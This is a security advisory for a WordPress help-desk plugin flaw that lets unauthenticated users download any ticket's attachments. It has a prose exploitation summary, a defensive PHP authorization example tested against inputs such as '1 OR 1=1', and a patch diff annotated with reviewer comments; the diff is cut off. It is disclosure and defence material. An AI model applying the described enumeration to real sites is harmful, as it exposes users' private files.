Published : June 21, 2026

CVE-2026-48887: JS Help Desk – AI-Powered Support & Ticketing System <= 3.0.9 Missing Authorization PoC, Patch Analysis & Rule

Severity Medium (CVSS 5.3)
CWE 862
Vulnerable Version 3.0.9
Patched Version 3.1.0
Disclosed June 1, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-48887:

The JS Help Desk – AI-Powered Support & Ticketing System plugin for WordPress (versions up to and including 3.0.9) contains a missing authorization vulnerability in the attachment download functionality. This allows unauthenticated attackers to download any attachment from any ticket without proper permission checks.

The root cause is a missing capability check in `getAllDownloads()` in `/js-support-ticket/modules/attachment/model.php` (around lines 259-280 in 3.0.9). The function reads the ticket identifier from the `downloadid` request parameter into `$jsst_downloadid` and hands it straight to `getAttachmentByTicketId()`; there is no check that the requesting user is an administrator, an agent, or the owner of that ticket, and none that the caller is authenticated at all. The neighbouring `deleteattachment()` in the module's controller only normalises its `id` and `ticketid` with `absint()` and likewise enforces no ownership or role check.

Exploitation is a single direct request to the WordPress AJAX handler with the action parameter that routes to `getAllDownloads()`, carrying a numeric ticket ID in `downloadid`. The function collects that ticket's attachments for whoever asks (the code that follows loads PclZip to bundle them), and because the identifier is a plain numeric ID, iterating over candidate values enumerates every ticket on the site.

The patch in 3.1.0 adds a conditional block at the start of `getAllDownloads()`. Administrators (`current_user_can('manage_options')`) and, when the agent add-on is active, staff (`isUserStaff()`) pass unchanged. Any other logged-in user must be the ticket's owner, determined by comparing `uid()` with `getUIdById($jsst_downloadid)`; a guest must satisfy `validateTicketDetailForVisitor($jsst_downloadid)`. Every other request returns early, before `getAttachmentByTicketId()` is called. This closes the unauthenticated download path. Two caveats remain visible in the diff: the guard performs no numeric check on `downloadid` before passing it to the lookups, and the owner comparison uses loose `!=`, so a pair of lookups that both return `false`/`null` would compare equal.
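
The decision tree the 3.1.0 patch adds, restated as a standalone PHP function so it can be exercised without WordPress. This is an added example, not the plugin's code: the `$ctx` array, the two callables and the sample ticket/owner data are assumptions standing in for `current_user_can()`, `isUserStaff()`, `isguest()`, `uid()`, `getUIdById()` and `validateTicketDetailForVisitor()`. It tightens two things the patch leaves open: the identifier is validated before any lookup, and the owner comparison is strict, with a failed lookup treated as a denial.

```php
<?php
declare(strict_types=1);

// Added example (not the plugin's code): the authorization decision that
// version 3.1.0 inserts at the top of getAllDownloads(), written as a pure
// function. Roles mirror the patch: site admin, agent (staff), ticket owner,
// or a guest who can validate the ticket. The $ctx shape, the callables and
// the sample data below are assumptions, not part of the plugin.

/**
 * Decide whether the current request may download a ticket's attachments.
 *
 * @param array{is_admin: bool, is_agent: bool, is_guest: bool, uid: int} $ctx
 * @param callable(int): ?int $ownerOf      owner uid of a ticket, null if no such ticket
 * @param callable(int): bool $visitorValid visitor-side ticket validation (e.g. emailed token)
 */
function canDownloadTicketAttachments(string $rawTicketId, array $ctx, callable $ownerOf, callable $visitorValid): bool
{
    // 1. Validate the identifier before it reaches any lookup. The patched code
    //    passes $jsst_downloadid straight through; rejecting anything that is
    //    not a positive integer keeps '', '0' and '1 OR 1=1' out of the model.
    if (!ctype_digit($rawTicketId)) {
        return false;
    }
    $ticketId = (int) $rawTicketId;
    if ($ticketId < 1) {
        return false;
    }

    // 2. Admins and agents may read every ticket, as in the patch.
    if ($ctx['is_admin'] || $ctx['is_agent']) {
        return true;
    }

    // 3. Logged-in users: owner only. Strict comparison, and an unknown ticket
    //    is a denial. Under the patch's loose `!=`, lookups that both fail
    //    (false on one side, null on the other) compare equal and the guard
    //    would fall through.
    if (!$ctx['is_guest']) {
        $owner = $ownerOf($ticketId);
        return $owner !== null && $owner === $ctx['uid'];
    }

    // 4. Guests: only if the visitor-side validation for this ticket passes.
    return $visitorValid($ticketId);
}

// --- constructed sample data (assumption, not from the plugin) --------------
$ticketOwners            = [101 => 7, 102 => 9]; // ticket id => owner uid
$visitorValidatedTickets = [102 => true];        // tickets a guest has proven access to

$ownerOf      = static fn (int $id): ?int => $ticketOwners[$id] ?? null;
$visitorValid = static fn (int $id): bool => $visitorValidatedTickets[$id] ?? false;

$admin = ['is_admin' => true,  'is_agent' => false, 'is_guest' => false, 'uid' => 1];
$user7 = ['is_admin' => false, 'is_agent' => false, 'is_guest' => false, 'uid' => 7];
$guest = ['is_admin' => false, 'is_agent' => false, 'is_guest' => true,  'uid' => 0];

$cases = [
    // [raw downloadid, request context, expected decision]
    ['101',      $admin, true],  // admin reads any ticket
    ['101',      $user7, true],  // owner reads own ticket
    ['102',      $user7, false], // another user's ticket is denied
    ['999',      $user7, false], // unknown ticket is denied, not silently allowed
    ['102',      $guest, true],  // guest with a validated ticket
    ['101',      $guest, false], // guest without validation
    ['1 OR 1=1', $user7, false], // non-numeric id rejected before any lookup
];

foreach ($cases as [$id, $ctx, $expected]) {
    $got = canDownloadTicketAttachments($id, $ctx, $ownerOf, $visitorValid);
    printf("%-10s uid=%d -> %s%s\n", $id, $ctx['uid'], $got ? 'allow' : 'deny',
        $got === $expected ? '' : '  <-- UNEXPECTED');
}
```

Run it with `php` on the command line; every row should print without an `UNEXPECTED` marker. The function returns a boolean rather than silently returning like the patched `getAllDownloads()`, so the caller can emit a 403 and log the denied attempt.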

Impact: Unauthenticated attackers can download any file attached to any ticket in the system. This includes sensitive documents such as identification files, screenshots, and other confidential data uploaded by support ticket users. The exposure of such data could lead to privacy violations, identity theft, or corporate data leakage.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/js-support-ticket/includes/activation.php
+++ b/js-support-ticket/includes/activation.php
@@ -201,8 +201,8 @@
                     ('tplink_faqs_user', '0', 'tplink', 'faq'),
                     ('show_breadcrumbs', '1', 'default', NULL),
                     ('productcode', 'jsticket', 'default', NULL),
-                    ('versioncode', '3.0.9', 'default', NULL),
-                    ('productversion', '309', 'default', NULL),
+                    ('versioncode', '3.1.0', 'default', NULL),
+                    ('productversion', '310', 'default', NULL),
                     ('producttype', 'free', 'default', NULL),
                     ('tve_enabled', '2', 'default', NULL),
                     ('tve_mailreadtype', '3', 'default', NULL),
--- a/js-support-ticket/includes/classes/customfields.php
+++ b/js-support-ticket/includes/classes/customfields.php
@@ -610,7 +610,7 @@
         if (!is_admin()) {
             $jsst_inquery .= ' AND adminonly != 1 ';
         }
-        $jsst_query = "SELECT field,fieldtitle,isuserfield,userfieldtype,userfieldparams,multiformid  FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE isuserfield = 1 AND " . $jsst_published . " AND fieldfor =" . esc_sql($jsst_fieldfor) . $jsst_inquery. " AND multiformid =" . esc_sql($jsst_multiformid). " ORDER BY ordering";
+        $jsst_query = "SELECT field,fieldtitle,isuserfield,userfieldtype,userfieldparams,multiformid  FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE isuserfield = 1 AND " . $jsst_published . " AND fieldfor =" . intval($jsst_fieldfor) . $jsst_inquery. " AND multiformid =" . intval($jsst_multiformid). " ORDER BY ordering";
         $jsst_data = jssupportticket::$_db->get_results($jsst_query);
         return $jsst_data;
     }
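Review bot: `is_admin()` at the top of this hunk is not an authorization check. It is true for any request to an admin-area URL, including admin-ajax.php, regardless of the caller's role, so the `adminonly != 1` filter can be bypassed by an unprivileged or unauthenticated caller hitting the AJAX endpoint. Gate admin-only fields on `current_user_can('manage_options')` or the plugin's own permission check. The `esc_sql()` to `intval()` change itself is correct: `esc_sql()` does not protect an unquoted integer context.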
@@ -628,7 +628,7 @@
             $jsst_inquery .= " AND adminonly != 1";
         }

-        $jsst_query = "SELECT `rows`,`cols`,required,field,fieldtitle,isuserfield,userfieldtype,userfieldparams,depandant_field  FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE isuserfield = 1 AND " . $jsst_inquery . " AND fieldfor =" . esc_sql($jsst_fieldfor) ." ORDER BY ordering ";
+        $jsst_query = "SELECT `rows`,`cols`,required,field,fieldtitle,isuserfield,userfieldtype,userfieldparams,depandant_field  FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE isuserfield = 1 AND " . $jsst_inquery . " AND fieldfor =" . intval($jsst_fieldfor) ." ORDER BY ordering ";
         $jsst_data = jssupportticket::$_db->get_results($jsst_query);
         return $jsst_data;
     }
@@ -638,7 +638,7 @@
             return false;
         }

-        $jsst_query = "SELECT `rows`,`cols`,required,field,fieldtitle,isuserfield,userfieldtype,userfieldparams,depandant_field  FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE isuserfield = 1 AND published = 1 AND search_admin =1 AND fieldfor =" . esc_sql($jsst_fieldfor) ." ORDER BY ordering ";
+        $jsst_query = "SELECT `rows`,`cols`,required,field,fieldtitle,isuserfield,userfieldtype,userfieldparams,depandant_field  FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE isuserfield = 1 AND published = 1 AND search_admin =1 AND fieldfor =" . intval($jsst_fieldfor) ." ORDER BY ordering ";
         $jsst_data = jssupportticket::$_db->get_results($jsst_query);
         return $jsst_data;
     }
--- a/js-support-ticket/includes/classes/uploads.php
+++ b/js-support-ticket/includes/classes/uploads.php
@@ -23,7 +23,7 @@
             if($this->jsst_uploadfor == 'ticket'){
                 if(!is_numeric($this->jsst_ticketid)) return false;
                 $jsst_path = $jsst_path . '/ticket';
-                $jsst_query = "SELECT attachmentdir FROM `".jssupportticket::$_db->prefix."js_ticket_tickets` WHERE id = ".esc_sql($this->jsst_ticketid);
+                $jsst_query = "SELECT attachmentdir FROM `".jssupportticket::$_db->prefix."js_ticket_tickets` WHERE id = ".intval($this->jsst_ticketid);
                 $jsst_foldername = jssupportticket::$_db->get_var($jsst_query);
             }elseif($this->jsst_uploadfor == 'article'){
                 $jsst_path = $jsst_path . '/articles/article_'.$this->jsst_articleid;
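Review bot: the `article` branch at the end of this hunk builds a filesystem path from `$this->jsst_articleid` with no check at all, while the `ticket` branch above it rejects a non-numeric id. If the article id can come from the request, `'/articles/article_'.$this->jsst_articleid` is a path traversal sink; apply the same `is_numeric`/`intval()` treatment before concatenating.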
--- a/js-support-ticket/includes/classes/user.php
+++ b/js-support-ticket/includes/classes/user.php
@@ -15,7 +15,7 @@
             $jsst_wpuserid = get_current_user_id();
             if (!is_numeric($jsst_wpuserid))
                 return false;
-            $jsst_query = "SELECT * FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . esc_sql($jsst_wpuserid);
+            $jsst_query = "SELECT * FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . intval($jsst_wpuserid);
             $jsst_currentuser = jssupportticket::$_db->get_row($jsst_query);
             $jsst_jssupportticket_registerform = JSSTrequest::getVar('jsst_support_register_nonce', 'post', '');
             $jsst_registerform = JSSTrequest::getVar('jssupportticket_registerform', 'post', 0);
@@ -66,7 +66,7 @@
                 $jsst_row->store();

                 if (is_numeric($jsst_row->id)) {
-                    $jsst_query = "SELECT * FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE id = " . esc_sql($jsst_row->id);
+                    $jsst_query = "SELECT * FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE id = " . intval($jsst_row->id);
                     $jsst_currentuser = jssupportticket::$_db->get_results($jsst_query);
                 }
             }
@@ -168,7 +168,7 @@
             $jsst_wpuserid = JSSTincluder::getObjectClass('user')->uid();
             if (!is_numeric($jsst_wpuserid))
                 return false;
-            $jsst_query = "SELECT COUNT(id) FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . esc_sql($jsst_wpuserid);
+            $jsst_query = "SELECT COUNT(id) FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . intval($jsst_wpuserid);
             $jsst_result = jssupportticket::$_db->get_results($jsst_query);
             if ($jsst_result > 0) {
                 return true;
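Review bot: the `$jsst_result > 0` test after the `COUNT(id)` query cannot work as written: `get_results()` returns an array, and in PHP an array compared with an integer is always greater, so the branch is taken even when the count is zero. Use `get_var()` for a scalar count and compare the integer, e.g. `if ((int) $jsst_result > 0)`.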
@@ -200,7 +200,7 @@
     function getjssupportticketuidbyuserid($jsst_userid)
     {
         if (!is_numeric($jsst_userid)) return false;
-        $jsst_query = "SELECT id FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . esc_sql($jsst_userid);
+        $jsst_query = "SELECT id FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . intval($jsst_userid);
         $jsst_uid = jssupportticket::$_db->get_results($jsst_query);
         return $jsst_uid;
     }
@@ -213,7 +213,7 @@
         if (!is_numeric($jsst_uid)) return false;

         $jsst_model = JSSTincluder::getJSModel('ticket');
-        $jsst_query = "SELECT id, ticketid FROM `" . jssupportticket::$_db->prefix . "js_ticket_tickets` WHERE wpuid = " . esc_sql($jsst_uid);
+        $jsst_query = "SELECT id, ticketid FROM `" . jssupportticket::$_db->prefix . "js_ticket_tickets` WHERE wpuid = " . intval($jsst_uid);
         $jsst_tickets = jssupportticket::$_db->get_results($jsst_query);

         do_action('jsst_addon_deletequery_for_user');
@@ -225,11 +225,11 @@
             LEFT JOIN `" . jssupportticket::$_db->prefix . "js_ticket_activity_log` AS activity_log ON activity_log.uid = user.id
             LEFT JOIN `" . jssupportticket::$_db->prefix . "js_ticket_erasedatarequests` AS erasedatarequests ON erasedatarequests.uid = user.id
             " . jssupportticket::$_addon_query['join'] . "
-            WHERE user.id = " . esc_sql($jsst_uid);
+            WHERE user.id = " . intval($jsst_uid);
         jssupportticket::$_db->query($jsst_query);

         do_action('jsst_reset_aadon_query');
-        $jsst_query = "DELETE user FROM `" . jssupportticket::$_db->prefix . "js_ticket_users` AS user WHERE wpuid = " . esc_sql($jsst_uid);
+        $jsst_query = "DELETE user FROM `" . jssupportticket::$_db->prefix . "js_ticket_users` AS user WHERE wpuid = " . intval($jsst_uid);

         if (jssupportticket::$_db->query($jsst_query)) {
             // --- START FILESYSTEM FIX ---
@@ -262,7 +262,7 @@
         if (!is_numeric($jsst_wpuid))
             return false;

-        $jsst_query = "SELECT id FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . esc_sql($jsst_wpuid);
+        $jsst_query = "SELECT id FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . intval($jsst_wpuid);
         $jsst_result = jssupportticket::$_db->get_var($jsst_query);
         return $jsst_result;
     }
@@ -271,7 +271,7 @@
         if (!is_numeric($jsst_uid))
             return false;

-        $jsst_query = "SELECT display_name,user_nicename FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE id = " . esc_sql($jsst_uid);
+        $jsst_query = "SELECT display_name,user_nicename FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE id = " . intval($jsst_uid);
         $jsst_result = jssupportticket::$_db->get_row($jsst_query);
         return $jsst_result;
     }
--- a/js-support-ticket/includes/includer.php
+++ b/js-support-ticket/includes/includer.php
@@ -15,7 +15,7 @@

     public static function include_file($jsst_filename, $jsst_module_name = null) {
         $allowed_modules = array(
-            'activitylog','attachment','configuration','department','email','emailtemplate','fieldordering','gdpr','jssupportticket','postinstallation','premiumplugin','priority','product','reply','reports','slug','status','systemerror','themes','thirdpartyimport','ticket','actions','agent','role','roleaccessdepartments','rolepermissions','useraccessdepartments','userpermissions','agentautoassign','aipoweredreply','announcement','autoclose','banemail','banemaillog','cannedresponses','dashboardwidgets','download','easydigitaldownloads','emailcc','emailpiping','envatovalidation','export','faq','feedback','helptopic','knowledgebase','mail','mailchimp','maxticket','mergeticket','multiform','multilanguageemailtemplates','note','notification','overdue','paidsupport','privatecredentials','smtp','sociallogin','themes','tickethistory','timetracking','useroptions','widgets','woocommerce','downloadattachment','articleattachmet','actions','actions','actions','actions','actions',
+            'activitylog','attachment','configuration','department','email','emailtemplate','fieldordering','gdpr','jssupportticket','postinstallation','premiumplugin','priority','product','reply','reports','slug','status','systemerror','themes','thirdpartyimport','ticket','actions','agent','role','roleaccessdepartments','rolepermissions','useraccessdepartments','userpermissions','agentautoassign','aipoweredreply','announcement','autoclose','banemail','banemaillog','cannedresponses','dashboardwidgets','download','zywrap','easydigitaldownloads','emailcc','emailpiping','envatovalidation','export','faq','feedback','helptopic','knowledgebase','mail','mailchimp','maxticket','mergeticket','multiform','multilanguageemailtemplates','note','notification','overdue','paidsupport','privatecredentials','smtp','sociallogin','themes','tickethistory','timetracking','useroptions','widgets','woocommerce','downloadattachment','articleattachmet','actions','actions','actions','actions','actions',
         );

         if (
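Review bot: the only change to `$allowed_modules` is the insertion of `'zywrap'`, a module unrelated to the attachment authorization fix, bundled into the security release without explanation. While touching this list: `'actions'` appears six times and `'themes'` twice, and `'articleattachmet'` looks like a misspelling that will never match a real module name; deduplicate the array and check that entry against the module directory.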
--- a/js-support-ticket/includes/jsst-hooks.php
+++ b/js-support-ticket/includes/jsst-hooks.php
@@ -287,7 +287,7 @@
     if(!is_numeric($jsst_user_id)){
         return false;
     }
-    $jsst_query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "users` WHERE id = " . esc_sql($jsst_user_id);
+    $jsst_query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "users` WHERE id = " . intval($jsst_user_id);
     $jsst_user = jssupportticket::$_db->get_row($jsst_query);

     $jsst_uid = "";
@@ -299,7 +299,7 @@

 	if(isset($_POST['user_id'])) $jsst_post_user_id = jssupportticket::JSST_sanitizeData($_POST['user_id']); // JSST_sanitizeData() function uses wordpress santize functions
     if ($jsst_post_user_id == $jsst_user_id) {
-        $jsst_query = "SELECT id FROM `" . jssupportticket::$_db->prefix . "js_ticket_users` WHERE wpuid = " . esc_sql($jsst_user_id);
+        $jsst_query = "SELECT id FROM `" . jssupportticket::$_db->prefix . "js_ticket_users` WHERE wpuid = " . intval($jsst_user_id);
         $jsst_id = jssupportticket::$_db->get_var($jsst_query);
     }
 	$jsst_name = "";
--- a/js-support-ticket/includes/permissions.php
+++ b/js-support-ticket/includes/permissions.php
@@ -12,7 +12,7 @@
         $jsst_query = "SELECT perm_allowed.status
 					FROM `" . jsjobs::$_db->prefix . "jsjobs_permissions` AS perm
 					JOIN `" . jsjobs::$_db->prefix . "jsjobs_permissions_allowed` AS perm_allowed ON perm_allowed.permissionid = perm.id
-					WHERE perm.permissions = '".esc_sql($jsst_permissionfor)."' AND perm_allowed.userid = ".esc_sql($jsst_userid);
+					WHERE perm.permissions = '".esc_sql($jsst_permissionfor)."' AND perm_allowed.userid = ".intval($jsst_userid);
         $jsst_result = jsjobs::$_db->get_var($jsst_query);
         return $jsst_result;
     }
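Review bot: this query in `js-support-ticket/includes/permissions.php` references `jsjobs::$_db` and the `jsjobs_permissions` / `jsjobs_permissions_allowed` tables, i.e. another plugin's class and schema. If the JS Jobs classes are not loaded this is a fatal error, and if they are, the help desk is reading permissions from the wrong product; confirm this is intended or switch it to `jssupportticket::$_db` and the help desk's own permission tables. The `intval()` on `$jsst_userid` is fine; `$jsst_permissionfor` stays `esc_sql()` inside quotes, which is acceptable.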
--- a/js-support-ticket/js-support-ticket.php
+++ b/js-support-ticket/js-support-ticket.php
@@ -1,17 +1,13 @@
 <?php

-/**
- * @package JS Help Desk
- * @author Ahmad Bilal
- * @version 3.0.9
- */
 /*
   Plugin Name: JS Help Desk – AI-Powered Support & Ticketing System
   Plugin URI: https://www.jshelpdesk.com
   Description: JS Help Desk is a trusted open source ticket system. JS Help Desk is a simple, easy to use, web-based customer support system. User can create ticket from front-end. JS Help Desk comes packed with lot features than most of the expensive(and complex) support ticket system on market. JS Help Desk provide you best industry help desk system.
   Author: JS Help Desk
-  Version: 3.0.9
+  Version: 3.1.0
   Text Domain: js-support-ticket
+  Domain Path: /languages
   License: GPLv3
   Author URI: https://www.jshelpdesk.com
  */
@@ -67,7 +63,7 @@
         self::$jsst_data = array();
         self::$_search = array();
         self::$_captcha = array();
-        self::$_currentversion = '309';
+        self::$_currentversion = '310';
         self::$_addon_query = array('select'=>'','join'=>'','where'=>'');
         self::$_jshdsession = JSSTincluder::getObjectClass('wphdsession');
         global $wpdb;
@@ -147,7 +143,7 @@
                     // restore colors data end
                     update_option('jsst_currentversion', self::$_currentversion);
                     include_once JSST_PLUGIN_PATH . 'includes/updates/updates.php';
-                    JSSTupdates::checkUpdates('309');
+                    JSSTupdates::checkUpdates('310');
                     JSSTincluder::getJSModel('jssupportticket')->updateColorFile();
                     JSSTincluder::getJSModel('jssupportticket')->jsst_check_license_status();
                     JSSTincluder::getJSModel('jssupportticket')->JSSTAddonsAutoUpdate();
@@ -1544,7 +1540,7 @@
     // in case if user is agent
     if ( in_array('agent',jssupportticket::$_active_addons)) {
         $jsst_query = "
-        SELECT id, photo FROM `" . jssupportticket::$_db->prefix."js_ticket_staff` AS staff WHERE staff.uid = ".esc_sql($jsst_uid);
+        SELECT id, photo FROM `" . jssupportticket::$_db->prefix."js_ticket_staff` AS staff WHERE staff.uid = ".intval($jsst_uid);
         $jsst_staff_data = jssupportticket::$_db->get_row($jsst_query);
         if (!empty($jsst_staff_data->photo)) {
             $jsst_maindir = wp_upload_dir();
--- a/js-support-ticket/modules/attachment/controller.php
+++ b/js-support-ticket/modules/attachment/controller.php
@@ -55,7 +55,7 @@
         exit;
     }

-        static function deleteattachment() {
+    static function deleteattachment() {

         $jsst_id        = absint( JSSTrequest::getVar( 'id' ) );
         $jsst_ticket_id = absint( JSSTrequest::getVar( 'ticketid' ) );
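Review bot: this hunk only re-indents the `static function deleteattachment()` declaration; no behaviour changes. The advisory text states that `deleteattachment()` normalises `id` and `ticketid` with `absint()` but enforces no ownership or role check, and nothing in this release adds one. If that is accurate, the delete path needs the same admin/agent/owner guard that `getAllDownloads()` receives in `model.php`.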
--- a/js-support-ticket/modules/attachment/model.php
+++ b/js-support-ticket/modules/attachment/model.php
@@ -10,7 +10,7 @@
             return false;
         $jsst_query = "SELECT filename,filesize,id
                     FROM `" . jssupportticket::$_db->prefix . "js_ticket_attachments`
-                    WHERE ticketid = " . esc_sql($jsst_id) . " and replyattachmentid = 0";
+                    WHERE ticketid = " . intval($jsst_id) . " and replyattachmentid = 0";
         jssupportticket::$jsst_data[5] = jssupportticket::$_db->get_results($jsst_query);
         if (jssupportticket::$_db->last_error != null) {
             JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -25,7 +25,7 @@
             return false;
         $jsst_query = "SELECT filename,filesize,id
                     FROM `" . jssupportticket::$_db->prefix . "js_ticket_attachments`
-                    WHERE ticketid = " . esc_sql($jsst_id) . " AND replyattachmentid = " . esc_sql($jsst_replyattachmentid);
+                    WHERE ticketid = " . intval($jsst_id) . " AND replyattachmentid = " . intval($jsst_replyattachmentid);
         $jsst_result = jssupportticket::$_db->get_results($jsst_query);
         if (jssupportticket::$_db->last_error != null) {
             JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -77,7 +77,7 @@
         $jsst_query = $jsst_query = "SELECT ticket.attachmentdir AS foldername,ticket.id AS ticketid,attach.filename  "
                 . " FROM `".jssupportticket::$_db->prefix."js_ticket_attachments` AS attach "
                 . " JOIN `".jssupportticket::$_db->prefix."js_ticket_tickets` AS ticket ON ticket.id = attach.ticketid "
-                . " WHERE attach.id = ". esc_sql($jsst_id);
+                . " WHERE attach.id = ". intval($jsst_id);
         $jsst_obj = jssupportticket::$_db->get_row($jsst_query);
         $jsst_filename = $jsst_obj->filename;
         $jsst_foldername = $jsst_obj->foldername;
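Review bot: `$jsst_query = $jsst_query = "SELECT ...` is a duplicated assignment; drop one. More importantly, `$jsst_obj->filename` and `$jsst_obj->foldername` are read without checking that `get_row()` returned a row, so an `attach.id` that does not exist yields a null-property access and then empty path components. Return early when `$jsst_obj` is null.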
@@ -107,7 +107,7 @@
         $jsst_query = "SELECT ticket.attachmentdir AS foldername,ticket.id AS ticketid,attach.filename  "
                 . " FROM `".jssupportticket::$_db->prefix."js_ticket_attachments` AS attach "
                 . " JOIN `".jssupportticket::$_db->prefix."js_ticket_tickets` AS ticket ON ticket.id = attach.ticketid "
-                . " WHERE attach.id = ". esc_sql($jsst_id);
+                . " WHERE attach.id = ". intval($jsst_id);
         $jsst_object = jssupportticket::$_db->get_row($jsst_query);
         $jsst_datadirectory = jssupportticket::$_config['data_directory'];
         $jsst_foldername = $jsst_object->foldername;
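Review bot: `$jsst_object->foldername` is dereferenced without checking that `get_row()` found a row for `attach.id`; a missing attachment id produces a null-property access and the path is then built from `$jsst_datadirectory` plus empty segments. Bail out when `$jsst_object` is null before touching the filesystem.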
@@ -128,7 +128,7 @@
         $jsst_query = "SELECT ticket.attachmentdir AS foldername,ticket.id AS ticketid,attach.filename  "
                 . " FROM `".jssupportticket::$_db->prefix."js_ticket_attachments` AS attach "
                 . " JOIN `".jssupportticket::$_db->prefix."js_ticket_tickets` AS ticket ON ticket.id = attach.ticketid "
-                . " WHERE attach.id = ". esc_sql($jsst_id);
+                . " WHERE attach.id = ". intval($jsst_id);
         $jsst_object = jssupportticket::$_db->get_row($jsst_query);
         $jsst_foldername = $jsst_object->foldername;
         $jsst_ticketid = $jsst_object->ticketid;
@@ -259,6 +259,22 @@

     function getAllDownloads() {
         $jsst_downloadid = JSSTrequest::getVar('downloadid');
+        //if not admin and agent
+        // check for ticket owner only in case of user
+        if(!current_user_can('manage_options') && !(in_array('agent',jssupportticket::$_active_addons) && JSSTincluder::getJSModel('agent')->isUserStaff())){
+            // in case of user check for ticket owner
+            if (!JSSTincluder::getObjectClass('user')->isguest()) {
+                $jsst_current_uid = JSSTincluder::getObjectClass('user')->uid();
+                $jsst_ticket_uid = JSSTincluder::getJSModel('ticket')->getUIdById($jsst_downloadid);
+                if ($jsst_current_uid != $jsst_ticket_uid) {
+                    return;
+                }
+            } else {
+                if (!JSSTincluder::getJSModel('ticket')->validateTicketDetailForVisitor($jsst_downloadid)) {
+                    return;
+                }
+            }
+        }
         $jsst_ticketattachment = JSSTincluder::getJSModel('ticket')->getAttachmentByTicketId($jsst_downloadid);

         if(!class_exists('PclZip')){
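Review bot: the new guard compares `$jsst_current_uid != $jsst_ticket_uid` loosely; if `uid()` signals a missing help-desk user with `false` and `getUIdById()` signals a missing ticket with `null`, PHP evaluates `false != null` as false and the request falls through to `getAttachmentByTicketId()`. Use `!==` on `(int)` casts and deny outright when `getUIdById()` returns nothing. Two smaller points: `$jsst_downloadid` is read from the request and passed to three lookups without the `is_numeric`/`intval()` treatment applied everywhere else in this patch, and the three bare `return;` statements deny silently, so blocked attempts leave no error and no log entry for the site owner. Finally, `isUserStaff()` grants any agent every ticket; the plugin has department-level ACL tables (`js_ticket_acl_user_access_departments` appears elsewhere in this diff), but that scoping is not applied on this path.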
--- a/js-support-ticket/modules/department/model.php
+++ b/js-support-ticket/modules/department/model.php
@@ -51,7 +51,7 @@
             $jsst_query = "SELECT department.*,email.email AS outgoingemail
                         FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` AS department
                         JOIN `" . jssupportticket::$_db->prefix . "js_ticket_email` AS email ON email.id = department.emailid
-                        WHERE department.id = " . esc_sql($jsst_id);
+                        WHERE department.id = " . intval($jsst_id);
             jssupportticket::$jsst_data[0] = jssupportticket::$_db->get_row($jsst_query);
             if (jssupportticket::$_db->last_error != null) {
                 JSSTincluder::getJSModel('systemerror')->addSystemError(); // if there is an error add it to system errorrs
@@ -94,7 +94,7 @@
                 $jsst_emailaddresses = array();
             }
             $jsst_query = "SELECT email FROM `" . jssupportticket::$_db->prefix . "js_ticket_email`
-                WHERE id = ".esc_sql($jsst_data['emailid']);
+                WHERE id = ".intval($jsst_data['emailid']);
             $jsst_email = jssupportticket::$_db->get_var($jsst_query);

             foreach ($jsst_emailaddresses as $jsst_edata) {
@@ -161,7 +161,7 @@
             $jsst_order = "<";
             $jsst_direction = "DESC";
         }
-        $jsst_query = "SELECT t.ordering,t.id,t2.ordering AS ordering2 FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` AS t,`" . jssupportticket::$_db->prefix . "js_ticket_departments` AS t2 WHERE t.ordering $jsst_order t2.ordering AND t2.id = ".esc_sql($jsst_id)." ORDER BY t.ordering $jsst_direction LIMIT 1";
+        $jsst_query = "SELECT t.ordering,t.id,t2.ordering AS ordering2 FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` AS t,`" . jssupportticket::$_db->prefix . "js_ticket_departments` AS t2 WHERE t.ordering $jsst_order t2.ordering AND t2.id = ".intval($jsst_id)." ORDER BY t.ordering $jsst_direction LIMIT 1";
         $jsst_result = jssupportticket::$_db->get_row($jsst_query);

         $jsst_row = JSSTincluder::getJSTable('departments');
@@ -191,7 +191,7 @@
                 if(in_array('agent',jssupportticket::$_active_addons)){
                     $jsst_query = "DELETE
                                 FROM `".jssupportticket::$_db->prefix . "js_ticket_acl_role_access_departments`
-                                WHERE departmentid = ".esc_sql($jsst_id);
+                                WHERE departmentid = ".intval($jsst_id);
                     jssupportticket::$_db->query($jsst_query);
                 }
                 JSSTmessage::setMessage(esc_html(__('The department has been deleted', 'js-support-ticket')), 'updated');
@@ -209,19 +209,19 @@
         if (!is_numeric($jsst_id))
             return false;
         $jsst_query = "SELECT (
-                    (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_tickets` WHERE departmentid = " . esc_sql($jsst_id) . ")
-                    + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id = " . esc_sql($jsst_id) . " AND isdefault = 1) ";
+                    (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_tickets` WHERE departmentid = " . intval($jsst_id) . ")
+                    + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id = " . intval($jsst_id) . " AND isdefault = 1) ";

                     if(in_array('agent', jssupportticket::$_active_addons)){
